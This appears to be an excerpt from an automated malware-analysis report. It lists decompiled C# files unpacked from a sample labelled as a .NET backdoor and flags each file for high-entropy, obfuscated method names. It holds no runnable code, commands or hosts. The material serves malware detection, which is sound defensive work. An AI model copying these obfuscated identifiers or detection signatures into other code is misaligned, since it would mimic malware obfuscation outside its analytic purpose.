Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, ImvIs8jqOkq0KW6fQAe.cs | High entropy of concatenated method names: '_92A8S', '_64582', '_4O32F', '_14174', '_78Cp4', 'q51EJ', 'gE9Ex', '_532P9', 'U75ay', 'lPW71'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, QUrewk6lgCd0EDqiuSY.cs | High entropy of concatenated method names: 'M99xJLukCc', 'c62hoBuJysQnUnh15T5', 'ICZ2uKuseAZWduGPSFi', 'W0krOUuaVReIMjnTKiC', 'iMx8WUunVmLM5nNbn8s', 'TMNpuKukfaEgA7kTg4y', 'yirYaju80wa9FmA5HjZ', 'MbGZAjup6HQWmykA1HS', 'rSkTxUuNeC7VrI9Thgb', 'dMR9wMuge4q55cpciX3'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, nv0tynnUQhlAFI0cbPb.cs | High entropy of concatenated method names: '_57MHj', 'q5s1u', 'St0ZnI8Dem', 'BciZHTY8Fg', 'muPZWte6HJ', '_453K7', '_89Y7m', 'G27J3', 'r42C5', 'j36V7'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, lrUvBkprZ6KLKcJHaH6.cs | High entropy of concatenated method names: 'tG91XruOK9FwXsV5fHP', 'JoR1W3uY2b7rcUkWSKv', 'Cv9A8Judq7lFweQ5Z4t', 'vHY6UouFLGCJFmrpW5H', 'Or35pkuEA6kklxiMPjY', 'RA0fcKuc1Es0mQ37U1p', 'HmG8W3ueLPIoBJqOSdw', 'tuBYOsuVFyVF0Xrd9Ej', 'F7MMyYuWf0colLKjsCc', 'UOdGkQu9ejH6Gi0mQCF'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, T0B2raXswhAco2PivCK.cs | High entropy of concatenated method names: 'wupU4JsdvB', 'dcNUBf91Y4', 'CuaUcys0hw', 'LMvdLcoJxQ7dVESfEFQ', 'yqWcXlos5xtt528Yy8l', 'KilayAoa3BZUWAqwVku', 'sgS6YbonopPtyxmTYFL', 'z4erEfokTbxaO1PISma', 'xabWWxoLYJavduroAiu', 'J6nEv1oSTjKhk3o1kP2'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, eA7fRWJZWeARQ2rPlfb.cs | High entropy of concatenated method names: '_6YPy5', 'mQKs7', 'jK5BXeSV6H', 'X2IBVOohO3', 'mBaL2vlsH0jG0qkgDF4', 'bLwaUNlk96GZDQPnDWy', 'RrcumtlnjrswOMxCQaY', 'kmfZ8ElJpeGO09otlRM'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, PZ0iuGnOTgKLUTmNMCf.cs | High entropy of concatenated method names: '_1u5g9', '_5WPX3', 'NBREk89VZ5', 'd478N', 'q4445', '_76715', 'z74dM', '_1Nx41', 'u3a27', '_4181m'
Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, QIOh5PJONRvYwxaAYg2.cs | High entropy of concatenated method names: 'PetTM7BnhQ', 'X97KLyEZufv6W2dZUZw', 'zTC8MTEa7QWl9CYEQL3', 'xCcg4ZEPY2Ik7kRmJZE', 'EGQQGwEIQB2IctpdMQu', 'LQsF0IEn8bJbK7cFyyP', 'edRoSFEJWGWvnhO12bV', 'meRTqk3vW4', 'Cga6s1ELAIQeKOcSQUY', 'ErRhgEEsiYFbVmh68wY'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Inqyb4XI5eESdox3xEO.csHigh entropy of concatenated method names: 'F26xw', 'B5292', 'H6F79', '_1zUd3', '_8bm8g', 'iOAY5', 'r8cie', '_76968', 'CKX5K', '_2PCqo'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, EwQB3b6sLHNOxFi5dZ5.csHigh entropy of concatenated method names: 'tFnmlMsDuZ', 'kgOmTcgeiM', 'daVmQVN7Et', 'OyimSPLWY4', 'wwum3FGltg', 'anA297h9dkB9JuaZOQu', 'NJPvo4hllP53jTs32s9', 'uSMltghxf0Jj3J849oD', 'UwHRGGh44r7uhaKuUTB', 'yIeEPOhV8iOPW0HABD9'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, MCEvOWXFaw29xeLlWIP.csHigh entropy of concatenated method names: '_1pl2V', 'O5OBiSdr5O', 'ImbUTp7Slt', 'uoDBDXfpbD', 'FuVSXPx0DvVLWHtNkKF', 'yMFo6Lx5UPpkmgJcSgq', 'YVWmNWxzkooMSmdcT0d', 'QvaLnZxSx4p19m5IZkd', 'zdDSoxxmBMLVP31boJj', 'sDkBED4ykrlscoU6DWx'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, AiVs7UJNDqxdLrZjkFf.csHigh entropy of concatenated method names: 'uiK3S9U2Fr', 'Fqy33oBvVP', 'xaD3U8qcqA', 'T0c3VpU14w', 'kv83LgAN6L', 'MB43ttsNV0', 'k1fFaAlTbxKbvEA17jC', 'f2Fnt8lvG5kIpCl5sAt', 'm2wxs1lDXBH2lKa9m4q', 'qiFM5flXDyTdiWKmFmg'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, DqEMRRj4aBPTBQb4yRQ.csHigh entropy of concatenated method names: 'U1sx4', '_5M51r', '_9NsU7', '_2cES4', '_7K7j7', '_77T77', '_14JT1', '_26u8V', 'Af734', '_4ZEZl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, enkxHwEreFR1flhCcF.csHigh entropy of concatenated method names: 'T7pBxMIXO', 'MP3k76fHdWy8un49VRF', 'eEcMVufCxrsNEuPM5uo', 'vRbIQSfRboLuINkrUP9', 'sjI0Pef8ogsnpihdRAZ', 'Yp0RH9fp64K9IQs10Q4', 'd8txKwfNYojJYhfOPZ0', 'lYJfDsfgkLMntDbLyx0', 'HVlXcgf6O7Hc5IXow00', 'PqRYhqfPo5WctXX8YB7'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, FvjvPf6wAuih2KNfko0.csHigh entropy of concatenated method names: 'RGDDDhS78a', 'wW1DPyFeGB', 'Dyv9DHiDW24d4A7SbpM', 'yt02baiTWiE1gVMhS97', 'RkwJ52i1ZfeHHBTAMST', 'u6nVjTivmGRNcJrs9sK', 'dbuHSCiX9v5O9TRijF9', 'Nvk9iJiBGm5CKUCEa7A', 'EkKPR9iublANqMgiS0V', 'oAnqKUiGb0QxscZZFKm'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, euskOljS3RyscI12L1q.csHigh entropy of concatenated method names: 'RyjG4AA28G', 'gfqGBrv7yR', '_1a7kH', '_5NJ51', 'XFr4n', 'BhcU4', 'v1t16', 'tbRGcST6Hm', '_4I55s', 'y6FW2'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, faRXrc63Tq6010aM3rD.csHigh entropy of concatenated method names: 'rkS4cDbMNPxlR2RNF35', 'MCtA0Gbwth00QsEmffm', 'uSvkVwbU8BRWSQNICep', 'LllxJib1DTZm7maixGo', 'dYU27gbvulWaUqTkIbc', 'CaPytobDbkec4PYWu5w', 'tqF8jybTWHacCd9W9bx', 'boGQf3bXXsypoM3bVaR', 'LxOqmAbB8v5656fuAAl', 'eCEkB4buaTVoLcNIk9J'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, b6BqYEACtIwSlgkSxS3.csHigh entropy of concatenated method names: 'crgdgnA9bC', 'vIGd4uZcGJ', 'AQ1FFldD8wGrjUlD4T7', 'yIQ0WEdTVRWv1UbQ6n4', 'NZ261gd1RWCPU2jZ3Tb', 'dwo7Sodv6F8HRgTPJq2', 'KT5dapOrAa', 'zB7d2Did3o', 'qaQd19LvX0', 'Qq0ik1dbyQ6PVeRq7dP'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, bjF6rxplTQaj9Mc0gwg.csHigh entropy of concatenated method names: 'WAjeu1P1Eb', 'lSuegBgTJp', 'i0Ebog1RrJKJRQYKDDS', 'tkeoSg1HhLoG3PIyB5g', 'RGYvIC1jcP32OOab7eg', 'xXs5PM1CeohOqiN9hYL', 'MRoZP618kaw3ORYMHlO', 'mqRy221pFJJGjCTAk3I', 'N7QppN1eyiYwDeE3l0g', 'MCq0ra1VgOKV1mmkCrN'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, l8gO24JyxYbOaELTVcS.csHigh entropy of concatenated method names: '_8vc9J', 'r5NQjhQlyT', 'B7jQRhnjUL', 'KQ7Q9m4HGU', 'zLrQzxQCCk', 'H6AShmiKNA', 'iRcSe5SgD1', 'b4vSxCQl6G', 'ua0S0saUQY', 'inmSmP5a6t'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, g591yxj7S9MwD9Sg9u.csHigh entropy of concatenated method names: 'ThXUmqeIF', 'Bg4hOP4C92AatnyWvE', 'KI5iMGlNDv5dVrFYol', 'H0Q8i4xI5PykimxCVj', 'SCah3hoVT1OPAjHAcW', 'DqPAt6QqOyo9P7SsNY', 'nyRxhdTff', 'a4k0imnZ4', 'eLAmhF6mN', 'FWoD9HFPy'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Gpf4LM6WPs4ZKoQlRJk.csHigh entropy of concatenated method names: 'uAXDSuPHYs', 'jCbD3INtpY', 'OjvDUnxWcw', 'Sb9DVSnarx', 'b7UShsiQF6laS59LnPa', 'zMHJLwijJ98tlEpK9il', 'vukaDBiCRfsIKCVg0Zd', 'W6b8q0iRwCKM2YKhCSH', 'v0uKIviH1O2xX8aJqrn', 'Cjb9Hui8Oiuy5D21NBj'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, V2R4AG6V3ATIPna3bPO.csHigh entropy of concatenated method names: 'RfcmA8R37M', 'wNlmXUFI1P', 'fujpd0hspaISl6tp1As', 'p5KctfhkYx0HUFnfhEU', 'i33GkFhLyQHBM2Y83Nq', 'RtOnqHhS46K2MPTElsa', 'yBfTfMhmwGtPLebJui0', 'CRrkbyh0gws9TjBKGRL', 'GDCYVRh5eVU3guuDa3v', 'DtXJbxhzumDIxhiEdAt'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, SfNng1JcfhZvhQsdcD9.csHigh entropy of concatenated method names: 'YOxQOvUAWq', 'wwlQYIyGLr', 'PDSQ5yE7hf', 'XixQITPHRF', 'MpOQwmfYZI', 'mrEQotFB8d', 'g8uQNIpq9K', 'oiaQGuA2rb', 'uDmQEK4TCt', 'JWGQskhuQG'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, roXQDD62yvVnYwfS0CG.csHigh entropy of concatenated method names: 'rOV04W260M', 'Okw0BlSiuj', 'HGs0c4RLUX', 'rdN0i4s0dV', 'CLb27krbLKwuPWIEM4Q', 'ARPererunCaCDZUio0v', 'my10DbrGbFMxfbHw8SA', 'P3H9O7rrNGeb4elQWXy', 'vI1lNErhVMv9MyUUegC', 'UDvyxGr2nsrVv5vvBHZ'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, UWosx36A7sESuUhi8ha.csHigh entropy of concatenated method names: 'N6IxzXOJuV', 'VpCWJ0GwSiZ572bpiEV', 'Qr4xvtGUr9hEJaoQMS6', 'KcB14bGfo0EJmIwDBku', 'BlL2fNGMkbhZye232TW', 'twHkgHG1Z664jO1FVfL', 'KepkySumpnZvw8MKIrw', 'gPmhJ2u0UvHPQlrnO3P', 'CWnZpeu5LQUYuYaMaFf', 'vuTf7fuzsK1woCuX2RD'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, LOMw5MpA0AyHYo8tHGb.csHigh entropy of concatenated method names: 'QgceMoMTX9', 'ggJSZ21m6Of1a4dtI0D', 'dm1EN6107l77g0dZpds', 'VJClfk1LOBkHSbccR4p', 'r3CIDk1Shk1DI91oo9g', 'EN9ooI15qvVu9WiFY50', 'fSW3sb16vuxykKJp4Sa', 'asrH581PemKyoy1O0J2', 'ihIa931IdpnoKM6akWf', 'OcDRbt1ZEEkEtvcEP7O'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, mAMIyuN52eMn2jbS22.csHigh entropy of concatenated method names: 'gDaNFJw4OaGw5cAoSHT', 'eSeVfXwoHss0uZ6Sgcm', 'lUd76VwQXeH7F36EPdo', 'tmWxqxwjB2N4mxhCom1', 'xTBXk6wC3Fuc6LH40QQ', 'e7xWc9wROALEwcOhZqj', 'bEWhFAwHjkYHrMhQZaJ', 'jnVA4ww8beRjQ7CSRbJ', 'UNdMaxwlqD6RlN1Fna8', 'oD2BuwwxGQEtgef7Cyx'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, oB93K6Qjj1tnFFJuvO.csHigh entropy of concatenated method names: 'qAr6yCePl', 'KPbpO1YL6', 'rHJkn7civ', 'SQXDSWqRXp4nhiZFqw2', 'UWceREqjU3ZoQ9eVxmr', 'HhGZWpqCu0cd9n2Jke1', 'FWUHqOqHXLLKqyQ46RZ', 'pSehaAq8yNIT8cC9FZs', 'cKxOQiqpCRPYpara1t0', 'NRTpP0qNl747XblCnqd'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, u4QFwHJKGWDnKB3LCY3.csHigh entropy of concatenated method names: 'mw18k', 'DzSZD', '_6287C', '_9EWfW', 'z89rS', '_6OJt5', 'w5Csg39RI5ib4eShLwx', 'WYaT0l9HUQwpsWpqtyE', 'Wbi9yO98AMAQACpIkrT', 'nJ4kUT9psaBNMi6gZC9'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, J59uibp7L99q3A3XtqJ.csHigh entropy of concatenated method names: 'imxxHNqKvf', 'v7xldoTNs2gJmBS0doR', 'uobJdjTgn7HsJQd8jxV', 'STWxViT80Dqi9x4H2pV', 'Nag4SGTp4hOVsg3RTFE', 'BYbOalT6qrhhWMptO15', 'gFpixBTPDedaGFESMrX', 'dNrl12TIQMOLkbffWmn', 'VfkyffTjZ64mHdayHq2', 'gUIkA1TCnfVvNj3Muni'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, hFs7WpqlBmYX0x9aNr.csHigh entropy of concatenated method names: 'ed8aleMDsRaGhTVkfyT', 'oTHRHAMTl5rwxm9pdkB', 'P2on55MXjxMhouCtGZl', 'LN5Jr3MB2RGxEJ9BMFh', 't21fXfMuNTuYsRMrfWb', 'DJ35huMGKHH7skiFkqU', 'U7raTPMbWbMSSHM48ok', 'FUCvxMMr2NgCCYJYxu7', 'aL6XhPMhn6wpuCFv7KC', 'NMxik4M25mDhoNl4dXG'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, QHJcbBAlHAk6yNXBBIR.csHigh entropy of concatenated method names: 'rPGDtLonRk', 'ACSDFjqITZ', 'Dp5DAt3aR2', 'pynDXBTvjI', 'HtpD8K76yi', 'V5NDntG0NQ', 'yA2DHaCpCd', 'YXgksrinBuctxtHtAvm', 'UQmvU1iJqRxt1DomoOe', 'eQWmqTisElBAD5SOrC2'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, hsA9oejH2YetWVDywJx.csHigh entropy of concatenated method names: 'KW2G3QxkbO', 'iVCTdOaU1AshuGxkXgf', 'oCrc0laM8NeEu74JEfN', 'OiEJ22awVVa7MsFok47', 'DMUmA9a1yIioNjSfjTs', 'c13BiYavUXyrp179Zq5', 'QSRlDmaD5ZgGaoN8qsY'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, O8TvVYenLrmnYxeUPCg.csHigh entropy of concatenated method names: 'Al5tMTWvU0', 'LT9tKZ1boQ', 's3ftqb8UOo', 'RWOtapvZHn', 'AAUt2kyme7', 'Pgc5Idj6cEpVh2Uqi1l', 'UihjikjPCVZrP9RF0a1', 'HETAKujNIb0uDhLgOWJ', 'cW1PDMjgxtso13eFrmM', 'QQEdCqjIfPDGGgPegCK'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, oRjG8mJ2lCXs9DkOfmB.csHigh entropy of concatenated method names: 'VdWQ1Z57jt', 'Wb3QyN3J9n', 'd8rQJYOObT', 'BvyrVqVCFNPNxE8vlxs', 'TFKa60VRBVV3AmsU33R', 'C6vIPAVHHc4PhM88Y2b', 'chINSxV8XYZNoOZvIWn', 'tBvjZxVpJd78Ee2XZvA', 'QcoZHcVNlBQJ2SNAJk7', 'bffcRaVgAQjADd3ha5U'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, xT3Ep46HVKXmApwhrn6.csHigh entropy of concatenated method names: 'ydZ0IKRkMT', 'GDbyYJbZgXHyZptctY9', 'T4xlTjbaA1jhhF5ndHh', 'Q7VXuNbPveklW3dgfV3', 'OTdUR5bIMZ1cJhHHTsy', 'fOOcrTbnUcWPCotCKwI', 'x8xvq4bJWnWonO1AyAX', 'RdKLULbscT6jSVDvEGL', 'Vq0pWNbHHqGDmEyajLc', 'c5kGMjb8SkRf0GwsPcS'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Qax6SuJRFWtVFokNj1U.csHigh entropy of concatenated method names: 'nmhQMDcbdV', 'riTQKmrvwg', 'AOjQq4hJ47', 'toRQaIDJr4', 'fgP6JGVcLXAOWWug4Eo', 'V8UU2BVefXAS8fgbvU5', 'aONuBUVVehjsObDRcQU', 'd5BLPFVFZZBUBokIpCG', 'IDXgMPVEex3D8R07G6S', 'fGwPM4VWLqvHF4jdkeq'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, JqJQvUpedGs8ZBoklE2.csHigh entropy of concatenated method names: 'FSSOHgvqXkw0TKQU0kH', 'jHDXrFvfmV5EOeHqlXO', 'HhsXvwvMMMZphR7RLZC', 'EfVGExvwFfIYnB1clWY', 'iytBkWvUSY1kHSunhyI', 'KUNywYv1i7x5FIGsFP5', 'X0UE8Avv5hy51faagPP', 'IEO1VsvDuigRWfZItKS', 'sVmaAK1zKSv5iUVKQMc', 'Unvi0kvyG9rEhBQdEOf'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, e5eFcPpij8nUPHa7ESx.csHigh entropy of concatenated method names: 'KvCDCPvelIEqZ8Zt4m0', 'P84VwrvV5jwjHXkEHkI', 'kTaU3PvWeFZJ8M7pJit', 'Dhr3Gtv9xmUNRYV5Ujr', 'Pu2YwFvl6d7JnGsEFNI', 'pWrXt8vx1qIahnHn82c', 'ww9vFpv4ysO3nJ52XqH', 'gwGKrHvoetmPa6bptv0', 'Mccs5BvQKLZSfwRJrNl', 'hMnMiPvEcFwINy6YWK4'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, s0LFuJptWYWsnrfE88u.csHigh entropy of concatenated method names: 'e6prNmvPToCjc3kpi5G', 'eoHMhevIL4OaKDej9Il', 'hG8Oo8vZFPfFOH8iUH4', 'kFkS1Eva4Leh2Z817LX', 'MhkofjvnWEa1HmnfTNE', 'f951LJvJXouQmI7jgNh', 'duVEmkvsgjsCcXO22KU', 'MHdgpGvkCd1MQQSnjby', 'c9chqmvLZSuvckNEIr9', 'FWqKdZvgGLihynRH1B6'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, H7T6jwjmOx9lNTWdDxl.csHigh entropy of concatenated method names: 'BVPGzGXG2n', 'EAUEhpCawp', 'BKuEewZXPf', 'n5dExaDi9d', 'fALE0PnUGL', 'sQREmRtMqE', 'OY1s3', '_236C9', '_55815', '_4h4fn'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, G5Dm0qeomkErKAZ15BS.csHigh entropy of concatenated method names: 'Z4JKq', 'nZ16s', 'p8372', 'zQB8C', '_6a21e', '_24y46', '_6549r', 'Ig3sJ', 'U9Y8A', 'B6665'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, nx8df4p9iJRRO3JF4sd.csHigh entropy of concatenated method names: 'O9qxcGmWdg', 'PHaCDfuTA5njMTgxajG', 'nEkkvhuX2FNWqdmoJE2', 'AeYpRwuvyegjrbK2xjP', 'RkCpq1uDFU4PnkgPfct', 'iUOA4PuBOAbaIlo08qa', 'WD0DMBuuB9UMbUHQJW3', 'o7gwaVuGqL7oAo5oUm9', 'CBcxvsWjVp', 'd9X7EHuhgX7VsvOOBNl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, X448kW6d2bVvVdMgqad.csHigh entropy of concatenated method names: 'S1kywHbrcod03hkdS1F', 'bknnsQbh9fDY3PkwIhY', 'LryI9wb2BFsRWmPN9UI', 'oGOBdtbAchwkDf94Eex', 'cPQRrTbivXaDJvibnA1', 'ELqAyrbKih9XrGQRO3j', 'oPiD4ab7APLijMvPT1G', 'YTLs9tb3rSaHNqNrh7d', 'GsNYVKbtqfXiMLgxXi7', 'trA294bOqTCgvAHdTYE'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, WpF3Dj6EVtorViSduRd.csHigh entropy of concatenated method names: 'pv20jMN8ev', 'fQS0R7980H', 'CJCOVcrI0ZRIh8OjhfO', 'fnJM1Gr6VQ02mw8LJF9', 'XVKdsKrPcsgGE06v0HC', 'gH3XatrZaSn2Jt1OtkY', 'bJf7PgraSkg7haJJpR9', 'kyOS1jrnteklTV89jyE', 'hZddsxrJIqYjgWwQDLB', 'dWwplyrsgNbleUrlubF'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, GbY3fHn3EGuVYP1yqX7.csHigh entropy of concatenated method names: 'TFdsn1nlgO', 'ARysHUwUN5', 'skEsWRJDI9', '_7I451', 'Gky5s', 'i135j', '_73C49', 'gafji', 'u9431', 'XVksOR8bbS'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, mXCKHYeIKotCYJVfRRA.csHigh entropy of concatenated method names: 'Up3NbtTLDp', 'jowNCaaxL0', 'ReFfcpZfLgIkcKg77YF', 'VqaJcZZMrGeF29KNl1o', 'QDiigeZwxFELdA9MsJx', 'hxMdlaZUA3pgX2WwmA0', 'igwtjEZ1xHrflhKTL3I', 'tgKCd2ZvarTdxkyyoOX', 'AnCLR4ZD4KnjU06kBQN', 'hMtceDZTl5urHYxYgYa'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, xNPv3Z613tp3DHpPW1L.csHigh entropy of concatenated method names: 'OntlQiGmx6m5KPyo5dD', 'SaHntGG0j7fp5pnjXts', 'GpZcRMG5ssvZnvY4XWJ', 'oAvMaHGzUYRlDvSGLrL', 'qlKxhtbyUR4RmaVqjNW', 'rS2q2ZGLA2CFoxdL0FZ', 'q9wZISGSCOWyH11p7Ix'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, gVO6hFX7pYdgTcMMkBf.csHigh entropy of concatenated method names: '_82Obu', 'o6612', 'fNmBB8GR7C', 'eWrUtZVp8G', 'DxLBpdTyYP', 'TRBuVR4tQy5p38BAPBN', 'zIZAYs4OKhj7ZsnhctL', 'c4CyeK4YBJ8Y3aNERDl', 'bvycKQ4d9l34KBCDXuE', 'TUIacq4FWqdoCLUj44a'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, TPqytTXMQtIsHT78ZZt.csHigh entropy of concatenated method names: '_9J248', 'fYZ3r', '_64w38', 'sEaBcHDYTU', 'JPRBq9xd8B', 'yQtQXn4ot3ARvfgT7XY', 'o3QnsO4QW7lusAK4L9X', 'xyR11A4jK7A37OhwEyt', 'pkSAti4CsQsRtTTT8xN', 'IyoZGb4RjPFLjvVRw6o'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, OT69CYXPsJXR301VlIJ.csHigh entropy of concatenated method names: 'G36l1', '_62D97', '_6f6RV', 'anNUWv7kcE', 'ALcBZkNq5l', 'NLkUOQTRCd', 'fqIBWlOAGY', 'bEf9my4ZSn6HtvWaOBN', 'maYJJy4a2hGE58mKJD4', 'v1udig4PCB7mhMRaXfl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, tfDGX0pV7KPBuJJAttT.csHigh entropy of concatenated method names: 'BeW7xRBinIaC6YISMF9', 'UqcPbNBKGl1AQJH7OuB', 'EmxDVeB7NBSBfdROmlP', 'adVSqEB3Zep2N6TuhPB', 'ngoX5tBtAMdQHvPI2Xm', 'aUWw9fBOGqJV2NNmfe5', 'ASqqL5BYD8nqxswFxvs', 'jtqPcfBd0BoZVyGRK7L', 'QWLDQCB2IBqSdakqd7y', 'ua2H2tBAwIRQTwLoToB'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, osEYghXuPiThLGRisEX.csHigh entropy of concatenated method names: 'YyrLNmmXGv', 'RqVDbfQckvDv22myuco', 'UVN58uQele6wZXZBxfM', 'm4exesQFUOsD3RPNKPq', 'qKU9DGQER2q0BJgaT7r', 'A8gUi6B0EZ', 'dpJUvBT9q8', 'SxDU7xj8fy', 'mQSUMWmCAD', 'eDZUKaMVIp'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, vkgoLBJ4kHD8FbqLMHD.csHigh entropy of concatenated method names: 'jHgBMYFegj', 'YbFBSmAXKA', 'RGaBxMchdT', 'iVNBY8cyZm', 'w433AdNM8G', 'h9D3X6vmot', 'kp738CNP2w', 'XPW3niQS0p', 'b42pUGld16JcRLNLtMF', 'ideskdlOOvKJijEVHtl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, I3YwmApsdJ5FPGFxDYr.csHigh entropy of concatenated method names: 'EOpBJPXH8bntWMh2ePr', 'Na79WuX862LMi2XP679', 'lAZMRhXpbBq7RanZc5n', 'Ge71R3XNawAC7umsbIk', 'TEvib5XgpH3WpcvVZ7x', 'C3xTyYX61JowCxJpxvQ', 'YcHNcxXPBOKmyvn0UOn', 'CyZ89rXIC1m3YDbJxXQ', 'Mu12PvXZWNICoxVToqt', 'febPCJXa5V4VP5gFfEr'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, KYePyQ6uoWIdsiXnLmZ.csHigh entropy of concatenated method names: 'TTHmo5Vw1H', 'wP6mNEChCe', 'yxKmG6YPhI', 'd9imEePbrp', 'Pt2mshFJmt', 'P8cmbkkNNF', 'hoHmCRJYrb', 'ScsmZpHiMY', 'jJlm6Vgl0k', 'o7hmpuFGam'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, CHBTh2n1wnW0nvw8wFD.csHigh entropy of concatenated method names: '_38xG9', '_2Rn37', '_26Y3G', '_5h9t6', '_5Wi8d', '_2X4y9', 'Or4W2', 'F7LU7', 'b3aV3', 'gEK3x'
